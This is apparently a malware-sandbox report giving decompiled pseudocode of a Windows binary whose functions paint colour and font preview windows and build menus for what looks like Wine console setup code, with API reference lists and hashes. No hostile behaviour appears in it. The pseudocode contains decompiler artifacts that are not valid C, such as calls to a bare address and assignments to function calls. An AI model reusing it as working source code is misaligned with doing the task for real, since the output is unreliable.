                                                  				if(_v8 > 0x30) {
                                                  					L15:
                                                  					return DefWindowProcW(_a4, _a8, _a12, _a16);
                                                  				}
                                                  				_t7 = _v8 + 0x403ef0; // 0xcccccc04
                                                  				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M00403ED8))) {
                                                  					case 0:
                                                  						SetWindowLongW(_a4, 0, 0);
                                                  						goto L16;
                                                  					case 1:
                                                  						__eax = _a4;
                                                  						_v16 = GetWindowLongW(_a4, 0);
                                                  						if(_v16 != 0) {
                                                  							__ecx = _v16;
                                                  							__eax = DeleteObject(_v16);
                                                  						}
                                                  						goto L16;
                                                  					case 2:
                                                  						__eax = GetParent(_a4);
                                                  						_v12 = __eax;
                                                  						__eax =  &_v96;
                                                  						__ecx = _a4;
                                                  						__eax = BeginPaint(_a4,  &_v96);
                                                  						_v20 = GetWindowLongW(_a4, 0);
                                                  						if(_v20 != 0) {
                                                  							__eax = _v20;
                                                  							__ecx = _v96.hdc;
                                                  							_v32 = SelectObject(__ecx, _v20);
                                                  							_v24 = E00403FE0(__ecx, _v12, 0x203);
                                                  							__eax = _v24;
                                                  							__eax = CreateSolidBrush(_v24);
                                                  							__ecx =  &(_v96.rcPaint);
                                                  							__eax = _v24;
                                                  							__ecx = _v96.hdc;
                                                  							SetBkColor(__ecx, _v24) = E00403FE0(__ecx, _v12, 0x204);
                                                  							_v96.hdc = SetTextColor(_v96.hdc, _v96.hdc);
                                                  							__ecx =  &_v608;
                                                  							_push( &_v608);
                                                  							0x400000();
                                                  							__eax = GetModuleHandleW(0);
                                                  							__eax = LoadStringW(__eax, 0x201,  &_v608, __eax);
                                                  							_v28 = __eax;
                                                  							if(_v28 != 0) {
                                                  								__eax = _v28;
                                                  								__ecx =  &_v608;
                                                  								__eax = TextOutW(_v96.hdc, 0, 0,  &_v608, _v28);
                                                  							}
                                                  							_push(L"ASCII: abcXYZ");
                                                  							0x400000();
                                                  							__eax = __eax - 1;
                                                  							__eax = _v12;
                                                  							__ecx =  *(__eax + 0x48);
                                                  							__eax = _v32;
                                                  							__ecx = _v96.hdc;
                                                  							__eax = SelectObject(_v96.hdc, _v32);
                                                  						}
                                                  						_a4 = EndPaint(_a4,  &_v96);
                                                  						goto L16;
                                                  					case 3:
                                                  						__eax = _a12;
                                                  						__ecx = _a4;
                                                  						SetWindowLongW(_a4, 0, _a12) = __dx & 0x0000ffff;
                                                  						if((__dx & 0x0000ffff) != 0) {
                                                  							__ecx = _a4;
                                                  							InvalidateRect(_a4, 0, 1) = UpdateWindow(_a4);
                                                  						}
                                                  						L16:
                                                  						return 0;
                                                  					case 4:
                                                  						return GetWindowLongW(_a4, 0);
                                                  					case 5:
                                                  						goto L15;
                                                  				}
                                                  			}

                                                  APIs
                                                  • SetWindowLongW.USER32 ref: 00403D0B
                                                  • GetWindowLongW.USER32(?,00000000), ref: 00403D1C
                                                  • SetWindowLongW.USER32 ref: 00403D31
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00403D4F
                                                  • UpdateWindow.USER32(?), ref: 00403D59
                                                  • GetWindowLongW.USER32(?,00000000), ref: 00403D6A
                                                  • DeleteObject.GDI32(00000000), ref: 00403D7D
                                                  • GetParent.USER32(?), ref: 00403D8E
                                                  • GetWindowLongW.USER32(00000000), ref: 00403D95
                                                  • BeginPaint.USER32(?,?), ref: 00403DA6
                                                  • GetWindowLongW.USER32(?,00000000), ref: 00403DB2
                                                  • SelectObject.GDI32(?,00000000), ref: 00403DCD
                                                  • CreateSolidBrush.GDI32(?), ref: 00403DEB
                                                  • FillRect.USER32 ref: 00403DFA
                                                  • SetBkColor.GDI32(?,?), ref: 00403E08
                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E21
                                                  • GetModuleHandleW.KERNEL32(00000000,00000201,?,00000000), ref: 00403E42
                                                  • LoadStringW.USER32(00000000), ref: 00403E49
                                                  • TextOutW.GDI32(?,00000000,00000000,?,00000000), ref: 00403E6B
                                                  • TextOutW.GDI32(?,00000000,?,ASCII: abcXYZ,-00000001), ref: 00403E91
                                                  • SelectObject.GDI32(?,?), ref: 00403E9F
                                                  • EndPaint.USER32(?,?), ref: 00403EAD
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00403EC5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$ObjectText$ColorPaintRectSelect$BeginBrushCreateDeleteFillHandleInvalidateLoadModuleParentProcSolidStringUpdate
                                                  • String ID: 0$ASCII: abcXYZ
                                                  • API String ID: 1130743042-3949429782
                                                  • Opcode ID: 9ce1c748a96f240f315aaebbc052465b5b3b8b2b4127d53cf1f5489e694250fa
                                                  • Instruction ID: 79a4f98bfe486f990abeb93be7cd05f9abb81cc7e6ad64475d903cedf329ab3a
                                                  • Opcode Fuzzy Hash: 9ce1c748a96f240f315aaebbc052465b5b3b8b2b4127d53cf1f5489e694250fa
                                                  • Instruction Fuzzy Hash: F1512FB5A10208EFCB04DFE4DC88FEF7B79AB48701F108569F615AB290CB759A45CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E004021C0(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
                                                  				signed int _v8;
                                                  				struct tagRECT _v24;
                                                  				intOrPtr _v28;
                                                  				long _v32;
                                                  				int _v36;
                                                  				signed int _v40;
                                                  				struct HBRUSH__* _v44;
                                                  				int _v48;
                                                  				long _v52;
                                                  				void* _v56;
                                                  				signed int _v60;
                                                  				struct tagRECT _v76;
                                                  				intOrPtr _v80;
                                                  				intOrPtr _v84;
                                                  				char _v92;
                                                  				struct tagPAINTSTRUCT _v156;
                                                  				intOrPtr _t197;
                                                  				struct HWND__* _t208;
                                                  				struct HDC__* _t210;
                                                  				signed int _t211;
                                                  				struct tagRECT* _t228;
                                                  				signed int _t229;
                                                  
                                                  				_v36 = _a8;
                                                  				if(_v36 == 0xf) {
                                                  					_t208 = _a4;
                                                  					BeginPaint(_t208,  &_v156);
                                                  					GetClientRect(_a4,  &_v76);
                                                  					asm("cdq");
                                                  					_v40 = _v76.right + (_t208 & 0x00000007) >> 3;
                                                  					_t210 = _a4;
                                                  					_v52 = GetWindowLongW(GetParent(_t210), 8);
                                                  					_v8 = 0;
                                                  					while(_v8 < 0x10) {
                                                  						asm("cdq");
                                                  						_t211 = _t210 & 0x00000007;
                                                  						asm("cdq");
                                                  						_v24.top = (_v8 + _t211 >> 3) * (_v76.bottom - _t211 >> 1);
                                                  						asm("cdq");
                                                  						_v24.bottom = (_v76.bottom - _t211 >> 1) + _v24.top;
                                                  						_v24.left = (_v8 & 0x00000007) * _v40;
                                                  						_v24.right = _v24.left + _v40;
                                                  						_v44 = CreateSolidBrush( *(_v52 + 4 + _v8 * 4));
                                                  						FillRect(_v156.hdc,  &_v24, _v44);
                                                  						DeleteObject(_v44);
                                                  						_t210 = _a4;
                                                  						if(GetWindowLongW(_t210, 0) != _v8) {
                                                  							L12:
                                                  							_v8 = _v8 + 1;
                                                  							continue;
                                                  						}
                                                  						_v28 = 2;
                                                  						_v56 = SelectObject(_v156.hdc, GetStockObject(6));
                                                  						_v24.right = _v24.right - 1;
                                                  						_v24.bottom = _v24.bottom - 1;
                                                  						while(1) {
                                                  							MoveToEx(_v156.hdc, _v24.left, _v24.bottom, 0);
                                                  							LineTo(_v156.hdc, _v24.left, _v24.top);
                                                  							LineTo(_v156.hdc, _v24.right, _v24.top);
                                                  							SelectObject(_v156.hdc, GetStockObject(7));
                                                  							LineTo(_v156.hdc, _v24.right, _v24.bottom);
                                                  							LineTo(_v156.hdc, _v24.left, _v24.bottom);
                                                  							_t197 = _v28 - 1;
                                                  							_v28 = _t197;
                                                  							if(_t197 == 0) {
                                                  								break;
                                                  							}
                                                  							_v24.left = _v24 + 1;
                                                  							_v24.top = _v24.top + 1;
                                                  							_v24.right = _v24.right - 1;
                                                  							_v24.bottom = _v24.bottom - 1;
                                                  							SelectObject(_v156.hdc, GetStockObject(6));
                                                  						}
                                                  						_t210 = _v156;
                                                  						SelectObject(_t210, _v56);
                                                  						goto L12;
                                                  					}
                                                  					EndPaint(_a4,  &_v156);
                                                  					L19:
                                                  					return 0;
                                                  				}
                                                  				if(_v36 == 0x201) {
                                                  					_t228 =  &_v92;
                                                  					GetClientRect(_a4, _t228);
                                                  					asm("cdq");
                                                  					_t229 = _t228 & 0x00000007;
                                                  					_v60 = _v84 + _t229 >> 3;
                                                  					asm("cdq");
                                                  					if((_a16 >> 0x00000010 & 0xffff) < _v80 - _t229 >> 1) {
                                                  						_v48 = 0;
                                                  					} else {
                                                  						_v48 = 8;
                                                  					}
                                                  					_v32 = _v48;
                                                  					asm("cdq");
                                                  					_v32 = (_a16 & 0xffff) / _v60 + _v32;
                                                  					SetWindowLongW(_a4, 0, _v32);
                                                  					InvalidateRect(GetDlgItem(GetParent(_a4), 0x206), 0, 0);
                                                  					InvalidateRect(_a4, 0, 0);
                                                  					goto L19;
                                                  				}
                                                  				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                                  			}

                                                  APIs
                                                  • BeginPaint.USER32(?,?), ref: 004021F2
                                                  • GetClientRect.USER32 ref: 00402200
                                                  • GetParent.USER32(?), ref: 0040221B
                                                  • GetWindowLongW.USER32(00000000), ref: 00402222
                                                  • CreateSolidBrush.GDI32(00000010), ref: 00402292
                                                  • FillRect.USER32 ref: 004022AA
                                                  • DeleteObject.GDI32(?), ref: 004022B4
                                                  • GetWindowLongW.USER32(?,00000000), ref: 004022C0
                                                  • GetStockObject.GDI32(00000006), ref: 004022D8
                                                  • SelectObject.GDI32(?,00000000), ref: 004022E6
                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00402312
                                                  • GetClientRect.USER32 ref: 00402402
                                                  • SetWindowLongW.USER32 ref: 00402467
                                                  • GetParent.USER32(?), ref: 0040247A
                                                  • GetDlgItem.USER32 ref: 00402481
                                                  • InvalidateRect.USER32(00000000), ref: 00402488
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00402496
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004024AE
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Rect$Window$LongObject$ClientInvalidateParent$BeginBrushCreateDeleteFillItemMovePaintProcSelectSolidStock
                                                  • String ID:
                                                  • API String ID: 4085835047-0
                                                  • Opcode ID: 17c9f886189e01ccf5b9d113390713578b16aee4fcd0cbc763b7d8f5c916b4ab
                                                  • Instruction ID: 9303a75ab2c3ba74b8f95ecbcbdcd489286eec20776981bf3f25c8e5d723df10
                                                  • Opcode Fuzzy Hash: 17c9f886189e01ccf5b9d113390713578b16aee4fcd0cbc763b7d8f5c916b4ab
                                                  • Instruction Fuzzy Hash: 89A1B8B5900109AFCB44DFE8D988AEEBBB5BB4C301F14C559F909A7290CB74AA45CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 62%
                                                  			E00403A30(struct HMENU__* _a4, intOrPtr _a8) {
                                                  				struct HINSTANCE__* _v8;
                                                  				struct HMENU__* _v12;
                                                  				short _v524;
                                                  				int _t55;
                                                  				int _t58;
                                                  				int _t62;
                                                  				int _t66;
                                                  				int _t69;
                                                  				int _t73;
                                                  				int _t76;
                                                  				int _t80;
                                                  				int _t84;
                                                  
                                                  				_v8 = GetModuleHandleW(0);
                                                  				if(_a4 != 0) {
                                                  					_v12 = CreateMenu();
                                                  					if(_v12 != 0) {
                                                  						_t55 =  &_v524;
                                                  						0x400000(_t55);
                                                  						LoadStringW(_v8, 0x110,  &_v524, _t55);
                                                  						_t58 = InsertMenuW(_v12, 0xffffffff, 0x400, 0x110,  &_v524);
                                                  						0x400000( &_v524);
                                                  						LoadStringW(_v8, 0x111,  &_v524, _t58);
                                                  						_t62 = InsertMenuW(_v12, 0xffffffff, 0x400, 0x111,  &_v524);
                                                  						0x400000( &_v524);
                                                  						LoadStringW(_v8, 0x112,  &_v524, _t62);
                                                  						InsertMenuW(_v12, 0xffffffff, 0x400, 0x112,  &_v524);
                                                  						_t66 =  &_v524;
                                                  						0x400000(_t66);
                                                  						LoadStringW(_v8, 0x113,  &_v524, _t66);
                                                  						_t69 = InsertMenuW(_v12, 0xffffffff, 0x400, 0x113,  &_v524);
                                                  						0x400000( &_v524);
                                                  						LoadStringW(_v8, 0x114,  &_v524, _t69);
                                                  						_t73 = InsertMenuW(_v12, 0xffffffff, 0x400, 0x114,  &_v524);
                                                  						0x400000( &_v524);
                                                  						LoadStringW(_v8, 0x115,  &_v524, _t73);
                                                  						_t76 = InsertMenuW(_v12, 0xffffffff, 0x400, 0x115,  &_v524);
                                                  						if(_a8 != 0) {
                                                  							_t76 = InsertMenuW(_a4, 0xffffffff, 0xc00, 0, 0);
                                                  						}
                                                  						0x400000( &_v524);
                                                  						LoadStringW(_v8, 0x100,  &_v524, _t76);
                                                  						_t80 = InsertMenuW(_a4, 0xffffffff, 0x410, _v12,  &_v524);
                                                  						0x400000( &_v524);
                                                  						LoadStringW(_v8, 0x101,  &_v524, _t80);
                                                  						InsertMenuW(_a4, 0xffffffff, 0x400, 0x101,  &_v524);
                                                  						_t84 =  &_v524;
                                                  						0x400000(_t84);
                                                  						LoadStringW(_v8, 0x102,  &_v524, _t84);
                                                  						InsertMenuW(_a4, 0xffffffff, 0x400, 0x102,  &_v524);
                                                  						return 1;
                                                  					}
                                                  					return 0;
                                                  				}
                                                  				return 0;
                                                  			}
















                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403A3B
                                                  • CreateMenu.USER32 ref: 00403A51
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: CreateHandleMenuModule
                                                  • String ID:
                                                  • API String ID: 4123625242-0
                                                  • Opcode ID: 44af2e04ee94a2477b6f80a20243c39a53ae9f5717a535503f9b3983751ddad9
                                                  • Instruction ID: 08dd7e0be59b5a95a72c3cfd9a68bba1d091cf2ad76ef5236de47ab009263b15
                                                  • Opcode Fuzzy Hash: 44af2e04ee94a2477b6f80a20243c39a53ae9f5717a535503f9b3983751ddad9
                                                  • Instruction Fuzzy Hash: 00713DB5A4021CBBDF54DBA0CC49FDB7739EB44B14F108799B361A70D1DE74AA808B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E004024C0(intOrPtr _a4, intOrPtr _a8) {
                                                  				int _v8;
                                                  				WCHAR* _v12;
                                                  				struct _WNDCLASSW _v52;
                                                  				intOrPtr _v56;
                                                  				void _v264;
                                                  				void* _v268;
                                                  				void _v472;
                                                  				intOrPtr _v976;
                                                  				intOrPtr _v980;
                                                  				short _v984;
                                                  				void* __edi;
                                                  				int _t70;
                                                  				intOrPtr _t83;
                                                  				short _t95;
                                                  				intOrPtr _t101;
                                                  				void* _t103;
                                                  
                                                  				L0040A30C();
                                                  				E0040D210(_t103,  &_v268, 0, 0xd4);
                                                  				_v268 = _a4;
                                                  				if(_a8 == 0) {
                                                  					E00404B80(0,  &_v264);
                                                  				} else {
                                                  					E00402B50(_a4,  &_v264);
                                                  				}
                                                  				memcpy( &_v472,  &_v264, 0x33 << 2);
                                                  				_v52.style = 0;
                                                  				_v52.lpfnWndProc = E00403CD0;
                                                  				_v52.cbClsExtra = 0;
                                                  				_v52.cbWndExtra = 4;
                                                  				_v52.hInstance = GetModuleHandleW(0);
                                                  				_v52.hIcon = 0;
                                                  				_v52.hCursor = LoadCursorW(0, 0x7f00);
                                                  				_v52.hbrBackground = GetStockObject(4);
                                                  				_v52.lpszMenuName = 0;
                                                  				_v52.lpszClassName = L"WineConFontPreview";
                                                  				RegisterClassW( &_v52);
                                                  				_v52.style = 0;
                                                  				_v52.lpfnWndProc = E004021C0;
                                                  				_v52.cbClsExtra = 0;
                                                  				_v52.cbWndExtra = 4;
                                                  				_v52.hInstance = GetModuleHandleW(0);
                                                  				_v52.hIcon = 0;
                                                  				_v52.hCursor = LoadCursorW(0, 0x7f00);
                                                  				_v52.hbrBackground = GetStockObject(4);
                                                  				_v52.lpszMenuName = 0;
                                                  				_v52.lpszClassName = L"WineConColorPreview";
                                                  				_t70 = RegisterClassW( &_v52);
                                                  				if(_a8 == 0) {
                                                  					_v8 = 0x120;
                                                  				} else {
                                                  					_v8 = 0x121;
                                                  				}
                                                  				0x400000( &_v984);
                                                  				if(LoadStringW(GetModuleHandleW(0), _v8,  &_v984, _t70) == 0) {
                                                  					_t95 = L"Setup"; // 0x650053
                                                  					_v984 = _t95;
                                                  					_t101 =  *0x41f2a4; // 0x750074
                                                  					_v980 = _t101;
                                                  					_t83 =  *0x41f2a8; // 0x70
                                                  					_v976 = _t83;
                                                  				}
                                                  				_v56 = E0040B504( &_v472,  &_v264, 0xcc);
                                                  				if(_v56 != 0) {
                                                  					if(_a8 != 0) {
                                                  						E00401CB0(_a4,  &_v264);
                                                  						E00407B50(_v268);
                                                  					}
                                                  					if(_a8 == 0) {
                                                  						_v12 = 0;
                                                  					} else {
                                                  						_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x84)) + 0x24));
                                                  					}
                                                  					E00405CF0(_v12,  &_v264);
                                                  					return 1;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}




















                                                  APIs
                                                  • #17.COMCTL32 ref: 004024CB
                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?), ref: 00402546
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040255D
                                                  • GetStockObject.GDI32(00000004), ref: 00402568
                                                  • RegisterClassW.USER32 ref: 00402583
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004025A7
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004025BE
                                                  • GetStockObject.GDI32(00000004), ref: 004025C9
                                                  • RegisterClassW.USER32 ref: 004025E4
                                                  • GetModuleHandleW.KERNEL32(00000000,00000120,?,00000000), ref: 0040261A
                                                  • LoadStringW.USER32(00000000), ref: 00402621
                                                  • _memcmp.LIBVCRUNTIME ref: 00402661
                                                    • Part of subcall function 00407B50: IsWindowVisible.USER32 ref: 00407BB9
                                                    • Part of subcall function 00407B50: GetDC.USER32(?), ref: 00407C2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModule$ClassCursorObjectRegisterStock$StringVisibleWindow_memcmp
                                                  • String ID: Setup
                                                  • API String ID: 323827257-3839654196
                                                  • Opcode ID: 2e00a79dc07ff8ea0e03e896b10f3c0b96ef7051c37b4111a897907864eb7786
                                                  • Instruction ID: d81bca949205ec7e410f01f95046e8cb68a31f38d723d6d9a6e6d421a50492ab
                                                  • Opcode Fuzzy Hash: 2e00a79dc07ff8ea0e03e896b10f3c0b96ef7051c37b4111a897907864eb7786
                                                  • Instruction Fuzzy Hash: E3511FB5900218AFDB10DF95DD49BDE7BB4BB48704F1084AAE608B72C0D7B95A84CF99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 92%
                                                  			E00402234(signed int __edx) {
                                                  				intOrPtr _t125;
                                                  				signed int _t130;
                                                  				void* _t149;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					 *(_t149 - 4) =  *(_t149 - 4) + 1;
                                                  					L1:
                                                  					if( *(_t149 - 4) < 0x10) {
                                                  						L2:
                                                  						asm("cdq");
                                                  						_t130 = __edx & 0x00000007;
                                                  						asm("cdq");
                                                  						 *(_t149 - 0x10) = ( *(_t149 - 4) + _t130 >> 3) * ( *((intOrPtr*)(_t149 - 0x3c)) - _t130 >> 1);
                                                  						asm("cdq");
                                                  						 *(_t149 - 8) = ( *((intOrPtr*)(_t149 - 0x3c)) - _t130 >> 1) +  *(_t149 - 0x10);
                                                  						 *(_t149 - 0x14) = ( *(_t149 - 4) & 0x00000007) *  *(_t149 - 0x24);
                                                  						 *(_t149 - 0xc) =  *(_t149 - 0x14) +  *(_t149 - 0x24);
                                                  						 *(_t149 - 0x28) = CreateSolidBrush( *( *((intOrPtr*)(_t149 - 0x30)) + 4 +  *(_t149 - 4) * 4));
                                                  						FillRect( *(_t149 - 0x98), _t149 - 0x14,  *(_t149 - 0x28));
                                                  						DeleteObject( *(_t149 - 0x28));
                                                  						if(GetWindowLongW( *(_t149 + 8), 0) ==  *(_t149 - 4)) {
                                                  							L3:
                                                  							 *((intOrPtr*)(_t149 - 0x18)) = 2;
                                                  							 *(_t149 - 0x34) = SelectObject( *(_t149 - 0x98), GetStockObject(6));
                                                  							 *(_t149 - 0xc) =  *(_t149 - 0xc) - 1;
                                                  							 *(_t149 - 8) =  *(_t149 - 8) - 1;
                                                  							while(1) {
                                                  								L4:
                                                  								MoveToEx( *(_t149 - 0x98),  *(_t149 - 0x14),  *(_t149 - 8), 0);
                                                  								LineTo( *(_t149 - 0x98),  *(_t149 - 0x14),  *(_t149 - 0x10));
                                                  								LineTo( *(_t149 - 0x98),  *(_t149 - 0xc),  *(_t149 - 0x10));
                                                  								SelectObject( *(_t149 - 0x98), GetStockObject(7));
                                                  								LineTo( *(_t149 - 0x98),  *(_t149 - 0xc),  *(_t149 - 8));
                                                  								LineTo( *(_t149 - 0x98),  *(_t149 - 0x14),  *(_t149 - 8));
                                                  								_t125 =  *((intOrPtr*)(_t149 - 0x18)) - 1;
                                                  								 *((intOrPtr*)(_t149 - 0x18)) = _t125;
                                                  								if(_t125 == 0) {
                                                  									break;
                                                  								}
                                                  								L6:
                                                  								 *(_t149 - 0x14) =  *(_t149 - 0x14) + 1;
                                                  								 *(_t149 - 0x10) =  *(_t149 - 0x10) + 1;
                                                  								 *(_t149 - 0xc) =  *(_t149 - 0xc) - 1;
                                                  								 *(_t149 - 8) =  *(_t149 - 8) - 1;
                                                  								SelectObject( *(_t149 - 0x98), GetStockObject(6));
                                                  							}
                                                  							L5:
                                                  							L7:
                                                  							SelectObject( *(_t149 - 0x98),  *(_t149 - 0x34));
                                                  						}
                                                  						L8:
                                                  						continue;
                                                  					}
                                                  					L9:
                                                  					EndPaint( *(_t149 + 8), _t149 - 0x98);
                                                  					L10:
                                                  					L11:
                                                  					return 0;
                                                  					L12:
                                                  				}
                                                  			}







                                                  APIs
                                                  • CreateSolidBrush.GDI32(00000010), ref: 00402292
                                                  • FillRect.USER32 ref: 004022AA
                                                  • DeleteObject.GDI32(?), ref: 004022B4
                                                  • GetWindowLongW.USER32(?,00000000), ref: 004022C0
                                                  • GetStockObject.GDI32(00000006), ref: 004022D8
                                                  • SelectObject.GDI32(?,00000000), ref: 004022E6
                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00402312
                                                  • LineTo.GDI32(?,?,?), ref: 00402327
                                                  • LineTo.GDI32(?,?,?), ref: 0040233C
                                                  • GetStockObject.GDI32(00000007), ref: 00402344
                                                  • SelectObject.GDI32(?,00000000), ref: 00402352
                                                  • LineTo.GDI32(?,?,?), ref: 00402367
                                                  • LineTo.GDI32(?,?,?), ref: 0040237C
                                                  • GetStockObject.GDI32(00000006), ref: 004023B5
                                                  • SelectObject.GDI32(?,00000000), ref: 004023C3
                                                  • SelectObject.GDI32(?,?), ref: 004023D9
                                                  • EndPaint.USER32(?,?), ref: 004023EF
                                                  • GetClientRect.USER32 ref: 00402402
                                                  • SetWindowLongW.USER32 ref: 00402467
                                                  • GetParent.USER32(?), ref: 0040247A
                                                  • GetDlgItem.USER32 ref: 00402481
                                                  • InvalidateRect.USER32(00000000), ref: 00402488
                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00402496
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.310695921.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.310683309.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310721314.0000000000418000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310736598.000000000041F000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310745820.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000001.00000002.310752395.0000000000423000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_hvbvmxm.jbxd
                                                  Similarity
                                                  • API ID: Object$LineRectSelect$Stock$InvalidateLongWindow$BrushClientCreateDeleteFillItemMovePaintParentSolid
                                                  • String ID:
                                                  • API String ID: 326705783-0
                                                  • Opcode ID: 0f223b48c9c1fad625fe6f3797e3593d1823fe528c62288c8faa157e7c30c057
                                                  • Instruction ID: a2669e264eea661e60e1f78e57a3953fd2d4adc606f5a4596ff00acee2181a00
                                                  • Opcode Fuzzy Hash: 0f223b48c9c1fad625fe6f3797e3593d1823fe528c62288c8faa157e7c30c057
                                                  • Instruction Fuzzy Hash: 4741A8B5E10109EFCB44DFE8D988AEEBBB5AB4C300F108559F509E7254CA74AA44CF64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 65%
                                                  			E004070D0(void* __edi, intOrPtr _a4) {
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				void* _v28;
                                                  				int _v32;
                                                  				int _v36;
                                                  				int _v40;
                                                  				int _v44;
                                                  				intOrPtr _v48;
                                                  				int _v52;
                                                  				int _v56;
                                                  				char _v60;
                                                  				char _v4156;
                                                  				short _v12348;
                                                  				intOrPtr _t95;
                                                  				int _t96;
                                                  				intOrPtr _t115;
                                                  				void* _t144;
                                                  				void* _t145;
                                                  
                                                  				_t144 = __edi;
                                                  				E0040A440();
                                                  				_v8 = _a4;
                                                  				if( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                  					_t115 =  *((intOrPtr*)(_v8 + 0xb0));
                                                  					0x400000(_t115);
                                                  					_v48 = _t115;
                                                  					if(_v12 != 0) {
                                                  						0x400000("input setup failed: %#lx\n", _v12);
                                                  					}
                                                  				}
                                                  				_v28 = CreateEventW(0, 1, 0, 0);
                                                  				while(1) {
                                                  					_t95 =  *((intOrPtr*)(_v8 + 0xb0));
                                                  					0x400000(_t95, _v28, 0, 0,  &_v60,  &_v4156, 0x1000, 0, 0);
                                                  					_v12 = _t95;
                                                  					if(_v12 != 0x103) {
                                                  						goto L7;
                                                  					}
                                                  					0x400000(_v28, 0, 0);
                                                  					_v12 = _t95;
                                                  					if(_v12 == 0) {
                                                  						goto L7;
                                                  					}
                                                  					L31:
                                                  					EnterCriticalSection(0x41f57c);
                                                  					if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                                  						E00405A20(_v8, _v12, 0, 0, 0);
                                                  					}
                                                  					if( *((intOrPtr*)(_v8 + 0xc)) != 0) {
